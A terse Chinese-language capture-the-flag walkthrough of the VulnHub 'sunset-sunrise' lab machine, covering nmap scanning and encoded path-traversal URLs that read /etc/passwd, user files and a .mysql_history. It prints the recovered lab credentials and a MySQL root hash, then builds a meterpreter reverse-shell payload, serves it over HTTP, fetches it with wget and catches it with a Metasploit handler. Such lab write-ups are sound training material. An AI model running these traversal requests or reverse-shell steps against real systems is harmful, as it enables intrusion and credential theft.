仅供个人娱乐
靶机信息
https://www.vulnhub.com/entry/sunset-sunrise,406/
一、主机探测
二、信息收集
nmap -sS -sV -T5 -A -p-
http://192.168.174.132:8080/
三、漏洞利用
构造poc
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2f
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2fuser.txt
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.mysql_history
weborf/iheartrainbows44
sunrise thefutureissobrightigottawearshades
root *C7B6683EEB8FF8329D8390574FAA04DD04B87C58
以root执行wine命令,wine可以执行exe程序
msfpc windows 192.168.174.128
python -m SimpleHTTPServer 8888
use exploit/multi/handler
set encoder x86/shikata_ga_nai
set lhost 192.168.174.132
set lport 443
run
wget http://192.168.174.128:8888/windows-meterpreter-staged-reverse-tcp-443.exe